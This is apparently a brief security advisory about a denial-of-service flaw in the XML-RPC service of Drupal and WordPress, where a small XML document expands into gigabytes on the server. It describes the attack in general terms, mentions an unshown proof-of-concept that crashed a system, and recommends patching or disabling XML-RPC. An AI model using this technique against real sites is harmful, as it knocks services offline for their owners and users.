Drupal and WordPress Denial of Service

Drupal and WordPress frameworks are vulnerable to a denial of service condition within the XML-RPC service.

Details of the issue can be found here on the official sites for Drupal and WordPress. Basically the attack works by sending an XML-RPC call to the remote site with an initially small XML document. This element of the document is then iterated multiple times, expanding the document to an even larger size.

How does this work? Well, a small initial file of 200 KB will expand to 2.5 GB on the remote server due to a vulnerability called an XML Quadratic Blowup Attack. Attempting to parse multiple requests leads to all resources being consumed. This results in the application and even possibly the whole system falling over.

Using a simple proof of concept script it was possible to kill an entire site and underlying operating system within a few moments:

 

“System running out of memory. Availability of the system is in risk.”

 

Unless you have previously disabled XML-RPC or have patched your Drupal and WordPress frameworks in the last few days you are currently exposed to this denial of service attack and we would recommend that you update to the latest version of your framework as soon as possible.